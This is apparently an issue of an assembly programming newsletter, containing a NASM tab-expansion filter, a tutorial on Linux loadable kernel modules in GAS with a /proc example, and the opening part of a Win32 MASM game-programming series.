; nasm -f elf tab2sp.asm
; ld -o tab2sp tab2sp.o
section .data
buffer times 8 db ' '
errread db 'TAB2SP: Error reading input', 0Ah
erlen equ $-errread
align 4, db 0
errwrite db 'TAB2SP: Error writing output', 0Ah
ewlen equ $-errwrite
section .text ; standard name of the executable code section
; ld expects every program to start with _start
global _start
_start:
; We use EDI and ESI to store persistent data
; because syscall will not modify them.
mov edi, buffer ; EDI = address of buffer
sub esi, esi ; ESI = counter
; NOTE:
;
; Because int 80h expects to be within a separate
; procedure, we need to push a fake return address
; before invoking it. It can be anything, so we
; just push EAX.
.read:
sub eax, eax
inc al
push eax ; size of "string"
push edi ; address of buffer
dec al
push eax ; stdin = 0
push eax ; "return address"
mov al, 3 ; SYS_read
int 80h ; syscall
lea esp, [esp+16] ; clean the stack after reading (LEA preserves flags)
jc .rerror ; read error: FreeBSD sets the carry flag
or eax, eax
je .quit ; end of file reached
; Decide what to do:
;
; If the byte is a carriage return, ignore it.
; If the byte is a newline, initialize ESI = 0.
; If the byte is a tab, convert it to spaces.
; Otherwise, just write it.
mov dl, [edi]
cmp dl, 0Dh ; carriage return
je .read
cmp dl, 0Ah ; new line
je .newline
inc esi
cmp dl, 09h ; tab
jne .write
; It's a tab. Expand it.
mov byte [edi], ' '
mov eax, esi
neg eax
and eax, 7
add esi, eax
inc eax
jmp short .write
.newline:
sub esi, esi
.write:
push eax ; size of "string"
push edi ; address of buffer
sub eax, eax
inc al
push eax ; stdout = 1
push eax ; "return address"
mov al, 4 ; SYS_write
int 80h ; system call
lea esp, [esp+16] ; clean the stack (LEA preserves flags)
jnc short .read ; carry clear means the write succeeded
push dword ewlen
push dword errwrite
jmp short .err
.rerror:
push dword erlen
push dword errread
.err:
sub eax, eax
mov al, 2 ; stderr = 2
push eax
push eax ; "return address"
add al, al ; SYS_write
int 80h
add esp, byte 16
.quit:
sub eax, eax ; EAX = 0
push eax ; exit status
inc eax ; SYS_exit
push eax ; "return address"
int 80h
; Program ends here.
;--------------------------------------------------------------------------
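For comparison, the logic of the filter can be sketched in C. This is an
illustration of the same loop, not a translation of the listing: it works on
memory buffers instead of reading stdin one byte at a time, and the function
name tab2sp and its parameters are chosen here for the example.

```c
#include <assert.h>
#include <stddef.h>

/* Copy n bytes from in to out, dropping carriage returns and expanding
 * tabs to 8-column tab stops. out must have room for 8 * n bytes (the
 * worst case, where every input byte is a tab).
 * Returns the number of bytes stored in out. */
size_t tab2sp(const char *in, size_t n, char *out)
{
    size_t col = 0;                  /* plays the role of ESI */
    size_t w = 0;                    /* bytes written so far  */

    assert(in != NULL && out != NULL);
    for (size_t i = 0; i < n; i++) {
        char c = in[i];
        if (c == '\r')
            continue;                /* ignore carriage returns */
        if (c == '\n') {
            col = 0;                 /* new line: reset the counter */
            out[w++] = c;
            continue;
        }
        col++;
        if (c == '\t') {
            size_t pad = ((size_t)0 - col) & 7;
            col += pad;              /* counter now sits on the tab stop */
            for (size_t k = 0; k <= pad; k++)
                out[w++] = ' ';      /* pad + 1 spaces in total */
        } else {
            out[w++] = c;
        }
    }
    return w;
}
```

Feeding it the five bytes 'a', tab, 'b', CR, LF yields ten bytes: 'a', seven
spaces, 'b', and the newline.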
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Loadable Kernel Modules
by mammon_
If there is one area in linux that is sure to attract assembly language
coders, it is the coding of loadable kernel modules; after all, asm
programmers aren't known for sitting around in Ring 3 space waiting for the
CPU to assign their process some resources.
Kernel modules are Ring 0 programs that are dynamically linked into a running
kernel; they require LKM support in the kernel [ CONFIG_MODULES ]. Each
kernel ships with a given number of kernel modules, as most device drivers
are compiled as such; the modules are located in
/lib/modules/kernel_version#. Modules are managed with the commands insmod
[load module], modprobe [load module and all modules it depends on], lsmod
[list loaded modules], and rmmod [unload module]; information on loaded
modules can also be obtained from the /proc file system, e.g. /proc/modules.
Kernel Land
-----------
It need hardly be said that kernel-space programming is different from
user-space programming. For starters, simple bugs can panic the kernel, or
render kernel subsystems unreliable if not actually inoperable. It is
advisable, when developing kernel modules, to become well-acquainted with
the "Magic SysRq Key" commands.
There is no main function. Kernel modules must export the init_module and
cleanup_module routines; these will be called by the kernel when the module
is loaded and unloaded. The rest of the kernel module will generally consist
of callback routines which are executed in response to system events [e.g.
ioctl() calls, reading of /proc files, syscalls, interrupts].
The standard C libraries are also unavailable -- they are far away, in the
user-space shared by all normal, well-behaved programs. The only external
routines that a kernel module can call are those listed in the kernel symbol
table [which can be browsed via /proc/ksyms] and the INT 80 syscalls. Some
basic C-style routines are provided by the kernel, and are prototyped in
$INCLUDE/linux/kernel.h:
long simple_strtol(const char *,char **,unsigned int);
int sprintf(char * buf, const char * fmt, ...);
int vsprintf(char *buf, const char *, va_list);
int get_option(char **str, int *pint);
unsigned long memparse(char *ptr, char **retptr);
int printk(const char * fmt, ...);
Note that the standard kernel routines are documented in section 9 of the
manual, and can be browsed with
ls -1 /usr/man/man9 | cut -d. -f1
As mentioned in a previous article, the syscalls are listed in
/usr/include/asm/unistd.h .
Finally, accessing user-space memory is not easy. In C, there are macros
provided for this -- get_user(), put_user(), copy_from_user(),
copy_to_user() ... all defined in $INCLUDE/asm/uaccess.h -- and these boil
down to inline assembler routines that can be accessed, somewhat awkwardly,
from routines listed in the kernel symbol table [e.g. __get_user_1 and so
on]. In general, it is best to leave user/kernel-space interaction to /proc
and /dev files.
Developing Kernel Modules
-------------------------
What does all of this mean in terms of assembly language? Essentially, asm
kernel modules will have the same problems as C kernel modules, with the
added bonus that none of the C macros for kernel-mode programming will work.
When programming kernel modules, one is more or less restricted to using the
GAS assembler. NASM can be made to work, but by default it produces object
files in a format that the kernel module loader cannot recognize [note:
RedPlait has produced a patch for NASM to fix this; in addition, it is
possible to write a libBFD post-processor which will re-assemble the
sections in the appropriate order]. Information on GAS invocation and syntax
can be obtained from the 'as' manpage and info file, and the GAS
preprocessor is documented in the 'gasp' info page. Note that a particular
section of an info file can be reached directly by appending the sequence of
menu selections to the command; thus
info as Machine i386 i386-Syntax
would load the 'as' info section for i386 syntax details.
Kernel modules are unlinked object files -- they are linked to the kernel
dynamically, and so should not be run through ld. Using gcc, a kernel module
can be compiled with
gcc -c filename
assuming that the file extension is .s or .S . Gcc will produce a .o output
file which may be loaded using 'insmod' and unloaded using 'rmmod'. The
compilation/test cycle for a linux kernel module is essentially
gcc -c asm_module.s
insmod asm_module
lsmod
rmmod asm_module
Note that modules which cannot be initialized or unloaded will remain loaded
until reboot, thus preventing another module with the same name from being
loaded. In order to minimize reboots, it helps to symlink a number of 'test'
filenames to the original object file, so that 'asm_module.o' would be
linked to 'asm_module1.o', 'asm_module2.o', and so on.
Debugging kernel modules can be quite a chore. While kernel-mode debuggers
exist for linux, it is often more expedient to use primitive "printf"
debugging techniques and core file analysis. In the former case, the linux
kernel provides the function "printk()", which is the kernel-mode equivalent
of printf(); the one notable difference is that the format string should
begin with a 'priority code' indicating how syslogs should handle the
message. The priority codes are:
<0> Kernel Emergency
<1> Kernel Alert
<2> Kernel Critical Condition
<3> Kernel Error
<4> Kernel Warning
<5> Kernel Notice
<6> Kernel Info
<7> Kernel Debug
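To make the format concrete, here is a small user-space C sketch that picks
the priority code out of a printk-style string. It is purely illustrative:
the names printk_level and printk_level_name are invented for this example
and are not kernel routines; the level names are simply the ones from the
table above.

```c
#include <assert.h>
#include <stddef.h>

/* Return the priority (0..7) encoded as a leading "<N>" in msg,
 * or -1 if the string does not start with a priority code. */
int printk_level(const char *msg)
{
    assert(msg != NULL);
    if (msg[0] == '<' && msg[1] >= '0' && msg[1] <= '7' && msg[2] == '>')
        return msg[1] - '0';
    return -1;
}

/* Map a priority to the name used in the table above. */
const char *printk_level_name(int level)
{
    static const char *const names[8] = {
        "Emergency", "Alert", "Critical Condition", "Error",
        "Warning", "Notice", "Info", "Debug"
    };
    return (level >= 0 && level <= 7) ? names[level] : "(none)";
}
```

With this, a string such as "<1> Asm Module Loaded!\n" is reported as level
1, a Kernel Alert.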
In addition, when a kernel module 'crashes', it writes an 'oops' file to
STDERR. This is essentially a stripped-down core file giving the registers
and stack state at the moment of the crash; it can be saved to a file and
loaded with the ksymoops utility to make the report more coherent.
One of the best tools for debugging assembly language kernel modules is gcc
itself. If the module --or the problematic portion thereof-- can be written
correctly in C, a GAS version can be produced by compiling the module with
gcc -S filename
This will produce an assembly-language version of the program, loaded with
GAS preprocessor directives. This file can be cleaned up and compared
against the hand-tooled assembly language version in order to judge the
effects of C macros, data alignment, and sections.
Hello Kernel
------------
As usual, it is best to start with the most simple module possible in order
to demonstrate the absolute basics of LKM programming. Other than the use of
init and cleanup functions, this module should not present any surprises:
#---------------------------------------------------------------------Asm_mod.s
.globl init_module
.globl cleanup_module
.extern printk
.text
.align 4
init_module:
pushl $strLoad
call printk
popl %eax
xorl %eax, %eax
ret
cleanup_module:
pushl $strUnload
call printk
popl %eax
xorl %eax, %eax
ret
.section .rodata
.align 32
strLoad:
.ascii "<1> Asm Module Loaded!\n\0"
strUnload:
.ascii "<1> Asm Module Unloaded\n\0"
.section .modinfo
__module_kernel_version:
.ascii "kernel_version=2.2.15\0"
#---------------------------------------------------------------------------EOF
As you can see, this program does nothing special -- it simply outputs an
alert when the module is loaded or unloaded. Note the .modinfo section of
the program; this is where the module specifies which kernel it was compiled
for. In C, a macro determines this based on a constant in the kernel header
files; in assembly, you will have to specify the kernel version by hand or
with a Makefile. Also note the .rodata section -- this is where the kernel
expects to find string references, and one can expect a lot of segmentation
faults if the strings are placed in .data instead.
Using the /proc Filesystem
--------------------------
The trend in linux, as well as in other Unixes, is to provide runtime access
to kernel-space data through the /proc file system. Linux system tweakers
will no doubt be familiar with cat'ing /proc files to check the status of
kernel variables, and echo'ing values to those files in order to change the
values of such variables. The /proc filesystem is a handy mechanism for
interfacing with kernel modules without the relative complexity of a device
file and an ioctl() interface.
Creating an entry in the /proc file system consists of the following steps:
1. Prepare a proc_dir_entry struct to describe the /proc file
2. Register the /proc file to create it
3. Unregister the /proc file when finished with it
The most important component of this process is obviously the proc_dir_entry
structure; it is defined in $INCLUDE/linux/proc_fs.h:
struct proc_dir_entry {
    unsigned short low_ino;              //inode # of the /proc file
    unsigned short namelen;              //length of filename
    const char *name;                    //pointer to filename string
    mode_t mode;                         //Access mode [permissions]
    nlink_t nlink;                       //# of links to the file
    uid_t uid;                           //UID of file owner
    gid_t gid;                           //GID of file owner
    unsigned long size;                  //Size of the file
    struct inode_operations * proc_iops;
    struct file_operations * proc_fops;
    get_info_t *get_info;                //Function handling file reads
    struct module *owner;
    struct proc_dir_entry *next, *parent, *subdir;
    void *data;                          //pointer to 'user-defined' data
    read_proc_t *read_proc;
    write_proc_t *write_proc;
    unsigned int count;                  /* use count */
    int deleted;                         /* delete flag */
    kdev_t rdev;
};
The last 5 members of the structure are not defined in the proc_dir_entry
man page, and do not appear to be used; however, as demonstrated in the
sample code, space must be reserved for them.
In most cases, the majority of these structure members can be set to NULL in
order to have them filled with default values. The members that should
normally be set to null include low_ino, uid, gid, size, *proc_iops,
*proc_fops, *owner, *next, *parent, *subdir, and *data. This leaves the
following members to be filled by the program:
namelen -- length of *name string, without the terminating \0
*name -- .rodata string containing the name of the /proc file
mode -- access permissions for the file
nlink -- 1 for normal files, 2 for directories
*get_info -- callback routine for reads to the /proc file
Note that *get_info() is called for normal /proc file reads, e.g. `cat
/proc/modules`. In order to handle more advanced operations such as writes,
links, and so forth, an inode_operations and a file_operations structure
need to be set up.
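The namelen and mode values are easy to get wrong when they are typed in by
hand, so it can help to compute them once in C and copy the results. The
sketch below is illustrative only: the constant and function names are made
up for this example, and the octal values are the usual Unix file-mode bits,
the same ones the assembly listing later defines with .equ.

```c
#include <assert.h>
#include <string.h>

/* Usual Unix file-mode bits, written in octal. */
enum {
    MODE_IFREG = 0100000,   /* regular file   */
    MODE_IRUSR = 00400,     /* owner may read */
    MODE_IRGRP = 00040,     /* group may read */
    MODE_IROTH = 00004      /* others may read */
};

/* Mode for a regular, world-readable, read-only /proc file. */
unsigned proc_file_mode(void)
{
    return MODE_IFREG | MODE_IRUSR | MODE_IRGRP | MODE_IROTH;
}

/* namelen: length of the name without the terminating \0. */
unsigned short proc_name_length(const char *name)
{
    assert(name != NULL);
    return (unsigned short)strlen(name);
}
```

For a file named "AsmModule" this gives a namelen of 9 and a mode of 0100444
octal, which still fits in a 16-bit field.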
The *get_info() function has the following prototype:
int get_info(char *buffer, char **retBuf, off_t pos, int size);
where buffer is the buffer provided by the user-space program, size is the
size of that buffer, pos is the current position in the file [to support
multiple, sequential reads by the user-space program], and retBuf is a
pointer to a buffer which can be used in place of the supplied buffer [for
example, if size is too small]. When a return buffer is used, a pointer to
the buffer is stored in retBuf, and the size of the buffer is returned in
eax.
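A callback with this shape can be tried out in user space before it is
rewritten in assembly. The following C sketch is an assumption-laden
stand-in, not kernel code: the name demo_get_info is invented, retBuf and
pos are ignored, and snprintf() is used instead of the kernel's sprintf() so
that the size limit is respected.

```c
#include <assert.h>
#include <stdio.h>
#include <sys/types.h>   /* off_t */

/* Fill buffer with a fixed message and return the number of bytes
 * stored (not counting the terminating \0), never more than size - 1. */
int demo_get_info(char *buffer, char **retBuf, off_t pos, int size)
{
    int n;

    assert(buffer != NULL && size > 0);
    (void)retBuf;        /* no replacement buffer in this sketch */
    (void)pos;           /* single read; position is ignored     */

    n = snprintf(buffer, (size_t)size,
                 "This /proc file has nothing to say\n");
    if (n < 0)
        return 0;        /* formatting failed: report nothing written */
    if (n >= size)
        n = size - 1;    /* output was truncated to fit the buffer */
    return n;
}
```

The return value plays the part of eax in the assembly version: it tells the
caller how many bytes of the buffer are valid.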
It is important to use stack frames in all kernel-mode callbacks. The
prototype for a get_info function in GAS would be
.globl get_info
get_info:
pushl %ebp
movl %esp,%ebp
....
movl %eax,20(%ebp)
leave
ret
The parameters will all be at offsets of %ebp, as the default return value
[an invisible fifth parameter that is always zero] demonstrates.
Registering and unregistering a proc file are fairly straightforward. The
proc_register command has the prototype
proc_register(proc_dir_entry *parent, proc_dir_entry *child)
and always returns 0. The *parent structure must refer to a directory within
the /proc tree; the global symbols proc_root and proc_sys_root refer to the
directories /proc and /proc/sys, respectively. The child structure refers to
the /proc entry that is being created.
The proc_unregister command has the prototype
proc_unregister(proc_dir_entry * parent, int inode);
and returns 0 only on success. The parent node will be the same as in the
proc_register call, while inode refers to the inode assigned to the /proc
file being unregistered. Note that the inode of a /proc file is specified in
the first member of the proc_dir_entry structure; if the inode member is 0
on /proc file registration, an inode number is dynamically assigned and
stored in the inode member.
Hello Proc
----------
The following program will demonstrate the use of the get_info() function;
it creates a /proc file which, when read, will return a simple string in the
buffer provided by the user-space program.
#--------------------------------------------------------------------Asm_proc.s
.globl init_module
.globl cleanup_module
.globl ReadAsmProcFile
.globl procAsm
.extern printk
.extern sprintf
.extern proc_root
.extern proc_register
.extern proc_unregister
.text
.align 4
init_module:
pushl %ebp
movl %esp,%ebp
pushl $strLoad
call printk
popl %eax
pushl $procAsm
pushl $proc_root
call proc_register
addl $0x8, %esp
xorl %eax, %eax
leave
ret
cleanup_module:
pushl %ebp
movl %esp,%ebp
pushl $strUnload
call printk
popl %eax
movzwl procAsm, %eax
pushl %eax
pushl $proc_root
call proc_unregister
addl $0x8, %esp
xorl %eax, %eax
leave
ret
ReadAsmProcFile:
pushl %ebp
movl %esp,%ebp
pushl $strRead
movl 8(%ebp),%eax
pushl %eax
call sprintf
addl $8,%esp # pop the two 4-byte arguments
movl %eax,20(%ebp)
leave
ret
.section .modinfo
__module_kernel_version:
.ascii "kernel_version=2.2.15\0"
.section .rodata
.align 32
strName: .ascii "AsmModule\0"
strLoad: .ascii "<1> Asm Module Loaded!\n\0"
strUnload: .ascii "<1> Asm Module Unloaded\n\0"
strRead: .ascii "This /proc file has nothing to say\n\0"
.data
.align 32
#______________________File_Permissions
.equ S_IFREG, 0100000
.equ S_IRUSR, 00400
.equ S_IWUSR, 00200
.equ S_IXUSR, 00100
.equ S_IRGRP, 00040
.equ S_IWGRP, 00020
.equ S_IXGRP, 00010
.equ S_IROTH, 00004
.equ S_IWOTH, 00002
.equ S_IXOTH, 00001
#________________________________________proc_dir_entry structure
procAsm:
procAsm_low_ino: .short 0
procAsm_name_length: .short 9
procAsm_name: .long strName
procAsm_mode: .short S_IFREG | S_IRUSR | S_IRGRP | S_IROTH
procAsm_nlinks: .short 1
procAsm_owner: .short 0
procAsm_group: .short 0
procAsm_size: .long 0
procAsm_operations: .long 0
procAsm_read_proc: .long ReadAsmProcFile
.zero 40
#________________________________________end proc_dir_entry
#---------------------------------------------------------------------------EOF
The /proc file can be read with the usual `cat /proc/AsmModule` command. It
should be noted that get_info() is executed when the file is opened; this
allows different behavior to be supplied for file opens, reads, and writes.
Further Reading
---------------
Programming Linux kernel modules, either in assembly or in C, is a
complicated and challenging field. The following online resources provide
vital information on kernel module programming.
"Linux Kernel Module Programming Guide", by Ori Pomerantz
http://www.linuxdoc.org/LDP/lkmpg/mpg.html
The 'classic' guide to LKM programming. This work is part of the Linux
documentation project, and is available in most Linux distributions.
Most LKM texts will assume you are familiar with the concepts presented
in this one.
"(nearly) Complete Linux Loadable Kernel Modules", by pragmatic / THC
http://thc.pimmel.com/files/thc/LKM_HACKING.html
Based on the exploratory LKM hacking essays of Phrack 50 and 52,
this treatise on LKM hacking is very thorough and very informative.
The text contains an introduction to LKM programming and proceeds to
cover kernel modules from the security and hacking viewpoints, with
plenty of source code to back up the discussion. If you read or print
out only one LKM guide, this should be it.
"Linux Kernel Hacker Documentation"
http://jungla.dit.upm.es/~jmseyas/linux/kernel/hackers-docs.html
This page contains links to a number of articles and books on Linux
kernel-mode programming.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.............................................GAMING.CORNER
Win32 ASM Game Programming - Part 1
by Chris Hobbs
[This series of articles was first posted at GameDev.net and is now being
published here with the author's permission. Here is Chris Hobbs'
introduction on this particular article:
"A tutorial series on the development of a complete game, SPACE-TRIS, in
pure ASM. This one covers the design document, code framework, and some
Win32 ASM basics."
Visit his website at http://www.fastsoftware.com.
Preface, Html-to-Txt conversion and formatting by Chili ]
This is the article that I am sure all of you have been waiting ever so
patiently for ... a complete series on the development of a game, in pure
Assembly Language of all things. I know all of you are as excited about this
article as I am, so I will try and keep this introduction brief. Instead of
laying every single thing out to you in black and white, I will try and
answer a few questions that are asked most often, and the details will
appear as we progress ( I am making this up as I go you know ).
What is this article about?
---------------------------
This article is actually part of a seven article series on the development
of a complete game, SPACE-TRIS, in 100% assembly language. We will be
covering any aspect of game development that I can think of ... from design
and code framework to graphics and sound.
Who is this article for?
------------------------
This series is meant for anybody who wishes to learn something that they may
not have known before. Since the game is a relatively simple Tetris clone it
is great for the beginner. Also, given the fact that not many people are
even aware that it is completely possible to write for Windows in assembly
language, it is great for the more advanced developers out there too.
What do I need?
---------------
The only requirement is the ability to read. However, if you wish to
assemble the source code, or participate in the challenge at the end of the
article series, you need a copy of MASM 6.12+. You can download a package
called MASM32 that will have everything that you need, and then some. Here
is the link:
http://www.pbq.com.au/home/hutch/.
Why Assembly Language?
----------------------
Many of you are probably wondering why anybody in their right mind would
write in pure assembly language. Especially in the present, when optimizing
compilers are the "in" thing and everybody knows that VC++ is bug free,
right? Okay I think I answered that argument ... but what about assembly
language being hard to read, non-portable, and extremely difficult to learn?
In the days of DOS these arguments were very valid ones. In Windows though,
they are simply myths left over from the good old days of DOS. I might as
well approach these one at a time.
First, assembly language is hard to read. But for that matter so is C, or
even VB. The readability results from the skill of the programmer and
his/her thoroughness at commenting the code. This is especially true of C++.
Which is easier to read: Assembly code which progresses one step at a time
( e.g. move variable into a register, move a different variable into another
register, multiply ), or C++ code which can go through multiple layers of
Virtual Functions that were inherited? No matter what language you are in,
commenting is essential ... use it and you won't have any troubles reading
source code. Remember just because you know what it means doesn't mean that
everybody else does also.
Second, the issue of portability. Granted assembly language is not portable
to other platforms. There is a way around this, which allows you to write
for any x86 platform, but that is way beyond the scope of this article
series. A good 80-90% of the games written are for Windows. This means that
the majority of your code is specific to DirectX or the Win32 API, therefore
... you won't be porting without a huge amount of work anyway. So, if you
want a truly portable game, then don't bother with writing for DirectX at
all ... go get a multi-platform development library.
Finally, there comes the issue of Assembly Language being extremely
difficult to learn. Although there is no real way for me to prove to you
that it is easy, I can offer you the basics, in a few pages, which have
helped many people, who never saw a line of assembly language before, learn
it. Writing Windows assembly code, especially with MASM, is very easy. It is
almost like writing some C code. Give it a chance and I am certain that you
won't be disappointed.
Win32 ASM Basics
----------------
If you are already familiar with assembly language on the Windows platform,
you may want to skip this section. For those of you who aren't, this may be
a bit boring, but hang with it ... this is very important stuff. For this
discussion I will presume that you are at least familiar with the x86
architecture.
The first thing you need to understand are the instructions. There aren't
very many that you will be using often so I will simply cover the ones that
we care about.
MOV
---
This instruction moves a value from one location to another. You can move an
immediate value to a register or to memory, a register to a register, memory
to a register, or a register to memory. You cannot move from one memory
location directly to another memory location.
Example:
MOV EAX, 30
MOV EBX, EAX
MOV my_var1, EAX
MOV DWORD PTR my_var, EAX
The first example moves the value 30 into the EAX register. The second
example moves the value in EAX into the EBX register. The third example
moves the value of EAX into the variable my_var1. The fourth example also
stores EAX in memory, at the address of my_var; the DWORD PTR specifier
tells the assembler how much memory to write -- 1 byte ( BYTE ), 2 bytes
( WORD ), or 4 bytes ( DWORD ).
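If the effect of the size specifier is hard to picture, this little C model
may help. It is only a sketch with an invented function name, store_sized; it
imitates what an x86 store of a given width does to memory, writing the least
significant byte first and leaving the remaining bytes untouched.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store the low `width` bytes of value at dst, lowest byte first.
 * width is 1 ( BYTE ), 2 ( WORD ), or 4 ( DWORD ). */
void store_sized(unsigned char *dst, uint32_t value, size_t width)
{
    assert(dst != NULL);
    assert(width == 1 || width == 2 || width == 4);
    for (size_t i = 0; i < width; i++)
        dst[i] = (unsigned char)(value >> (8 * i));
}
```

Storing 11223344h as a BYTE changes one byte of memory to 44h; as a WORD it
writes 44h, 33h; as a DWORD it writes 44h, 33h, 22h, 11h.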
ADD & SUB
---------
These two instructions perform addition and subtraction.
Example:
ADD EAX, 30
SUB EBX, EAX
The examples simply add 30 to the EAX register and then subtract that value
from the EBX register.
MUL & DIV
---------
These two instructions perform multiplication and division.
Example:
MOV EAX, 10
MOV ECX, 30
MUL ECX
XOR EDX, EDX
MOV ECX, 10
DIV ECX
The examples above first load EAX with 10 and ECX with 30. EAX is always the
default multiplicand, and you get to select the multiplier. When performing
a multiplication the 64-bit answer is in EDX:EAX. The low 32 bits go into
EAX, and EDX receives the high 32 bits, which are nonzero only if the value
is too large for the EAX register. When performing a divide, the dividend is
the 64-bit value in EDX:EAX, so you must first clear the EDX register. That
is what the XOR instruction does, by performing an Exclusive OR of EDX with
itself. After the divide, the answer is in EAX, with the remainder, if any,
in EDX.
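The register pairing is easier to see with the numbers written out. The
sketch below models unsigned 32-bit MUL and DIV in Python rather than
assembly, so it can be run anywhere. The function names mul32 and div32 are
made up for this illustration, and the model ignores the flags.

```python
MASK32 = 0xFFFFFFFF

def mul32(eax, operand):
    """Model unsigned MUL r32: returns (edx, eax) holding the 64-bit product."""
    product = (eax & MASK32) * (operand & MASK32)
    return (product >> 32) & MASK32, product & MASK32

def div32(edx, eax, operand):
    """Model unsigned DIV r32: divides EDX:EAX, returns (quotient, remainder)."""
    if operand == 0:
        raise ZeroDivisionError("DIV by zero raises a divide error")
    dividend = ((edx & MASK32) << 32) | (eax & MASK32)
    quotient, remainder = divmod(dividend, operand & MASK32)
    if quotient > MASK32:
        raise OverflowError("quotient does not fit in EAX")
    return quotient, remainder

# The sequence from the text: 10 * 30, then divide the result by 10.
edx, eax = mul32(10, 30)        # MUL ECX
eax, edx = div32(0, eax, 10)    # XOR EDX,EDX clears the high half, then DIV ECX
```

A product that overflows 32 bits, such as mul32(0xFFFFFFFF, 2), is the case
where EDX comes back nonzero.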
Of course, there are many more instructions, but those should be enough to
get you started. We will probably only be using a few others, but they are
fairly easy to figure out once you have seen the main ones. Now we need to
deal with the calling convention. We will be using the Standard Call calling
convention since that is what the Win32 API uses. What this means is that we
push parameters onto the stack in right to left order, but we aren't
responsible for clearing the stack afterwards; the function being called
does that. Everything will be completely transparent to you, however, as we
will be using the pseudo-op INVOKE to make our calls.
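To make the push order and the stack clean-up concrete, here is a toy model
of a Standard Call invocation, written in Python with a list standing in for
the stack. It is only a sketch: invoke_stdcall and sub_two are hypothetical
names, and a real call deals in 4-byte stack slots rather than list items.

```python
def invoke_stdcall(stack, callee, *args):
    """Model INVOKE under stdcall: the caller pushes, the callee cleans up."""
    for arg in reversed(args):       # right to left: last argument pushed first
        stack.append(arg)
    stack.append("return address")   # pushed by the CALL instruction
    return callee(stack, len(args))

def sub_two(stack, argc):
    """Hypothetical callee: the first argument sits just below the return address."""
    first, second = stack[-2], stack[-3]
    result = first - second
    stack.pop()                      # RET pops the return address ...
    del stack[len(stack) - argc:]    # ... and 'RET 8' also discards the arguments
    return result                    # the result comes back in EAX

stack = ["caller data"]
result = invoke_stdcall(stack, sub_two, 5, 7)
```

After the call the stack holds exactly what it held before, which is the
point of the convention: the caller never has to adjust ESP itself.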
Next, there is the issue of calling Windows functions. In order to use
invoke, you must have a function prototype. There is a program that comes
with MASM32 which builds include files ( equivalent to header files in C )
out of the VC++ libraries. Then, you include the needed libraries in your
code and you are free to make calls as you wish. You do have to build a
special include file by hand for access to Win32 structures and constants.
However, this too is included in the MASM32 package, and I have even put
together a special one for game programmers which will be included in the
source code and built upon as needed.
The final thing that I need to inform you about is the high level syntax
that MASM provides. These are constructs, such as .IF/.ELSE and .WHILE, that
allow you to create If-Then-Else blocks and loops in assembly with C-like
expressions. They are easiest to show once we have some code to put in,
therefore you won't see them until next time. But, they are there ... and
they make life 100000 times easier than without them.
That is really about all you need to know. The rest will come together as we
take a look at the source code and such. So, now that we have that out of
the way, we can work on designing the game and creating a code framework for
it.
The Design Document
-------------------
Time for something a lot more fun ... designing the game. This is a process
that is often neglected simply because people want to start writing code as
soon as they have an idea. Although this approach can work for some people,
it often does not. Or, if it does work, you end up re-coding a good portion
of your game because of a simple oversight. So, we will cover exactly how to
create a design document that you will be able to stick to, and will end up
helping you with your game.
First, you need to have an idea of what you want the game to be, and how you
want the game to play. In our case this is a simple Tetris clone so there
isn't too much we need to cover in the way of game play and such. In many
cases though, you will need to describe the game play as thoroughly as
possible. This will help you see if your ideas are feasible, or if you are
neglecting something.
The easy part is finished; now we need to come up with as many details as we
possibly can. Are we going to have a scoring system? Are we going to have
load/save game options? How many levels are there? What happens at the end
of a level? Is there an introductory screen? These are the kinds of
questions that you should be asking yourself as you work on the design of
the game. Another thing that may help you is to storyboard or flow chart the
game on a piece of paper or your computer. This will allow you to see how
the game is going to progress at each point.
Once you have all of the details complete, it is time to start sketching the
levels out. How do you want the screens to appear? What will the interfaces
look like? This doesn't have to be precise just yet ... but it should give
you a realistic idea of what the final versions will look like. I tend to
break out my calculator and estimate positions at this point also. I have
actually run out of room while creating the menu screen before. This was my
own fault for not calculating the largest size my text could be and it took
a few hours to re-do everything. Don't make the same mistake, plan ahead.
The final stage is just sort of a clean-up phase. I like to go back and make
sure that everything is the way I want it to be. Take a few days break from
your game beforehand. This will give you a fresh viewpoint when you come
back to it later on. Oftentimes, you will stare at the document for so long
that something extraordinarily simple will be overlooked and not included in
your plan -- for instance, how many points everything is worth and the
maximum number of points the player can get ( Not that I have ever found out
halfway through the game that the player could obtain more points than the
maximum score allowed for, or anything like that ).
Whether you choose to use the process I have outlined, or one of your own
making, it is imperative that you complete this step. I have never been one
for wasted effort -- I do it right the first time if possible, and learn
from my mistakes, as well as the mistakes of others. If this weren't
necessary I wouldn't do it. So, do yourself a favor and complete a design
document no matter how simple you think your game is.
The final preparation step is something that I like to call code framework.
This is where you lay out your blank source code modules and fill them with
comments detailing the routines that will go into them and the basic idea
behind how they operate. If you think you are perfect and have gotten every
detail in your design document then you can probably skip this step. But,
for those of you like me, who are cautious, then give this phase a whirl. It
helps you see how all of the pieces will fit together and more importantly
if something has been neglected or included that shouldn't have been.
Here is an example of the framework that I am speaking about from
SPACE-TRIS. You can see that nothing much goes into it ... just an overview
of the module more or less.
;###########################################################################
; ABOUT SPACE-TRIS:
;
; This is the main portion of code. It has WinMain and performs all
; of the management for the game.
;
; - WinMain()
; - WndProc()
; - Main_Loop()
; - Game_Init()
; - Game_Main()
; - Game_Shutdown()
;
;
;###########################################################################
;###########################################################################
; THE COMPILER OPTIONS
;###########################################################################
.386
.MODEL flat, stdcall
OPTION CASEMAP :none ; case sensitive
;###########################################################################
; THE INCLUDES SECTION
;###########################################################################
;==================================================
; This is the include file for the Windows structs,
; unions, and constants
;==================================================
INCLUDE Includes\Windows.inc
;================================================
; These are the Include files for Window calls
;================================================
INCLUDE \masm32\include\comctl32.inc
INCLUDE \masm32\include\comdlg32.inc
INCLUDE \masm32\include\shell32.inc
INCLUDE \masm32\include\user32.inc
INCLUDE \masm32\include\kernel32.inc
INCLUDE \masm32\include\gdi32.inc
;====================================
; The Direct Draw include file
;====================================
INCLUDE Includes\DDraw.inc
;===============================================
; The Lib's for those included files
;================================================
INCLUDELIB \masm32\lib\comctl32.lib
INCLUDELIB \masm32\lib\comdlg32.lib
INCLUDELIB \masm32\lib\shell32.lib
INCLUDELIB \masm32\lib\gdi32.lib
INCLUDELIB \masm32\lib\user32.lib
INCLUDELIB \masm32\lib\kernel32.lib
;=================================================
; Include the file that has our prototypes
;=================================================
INCLUDE Protos.inc
;###########################################################################
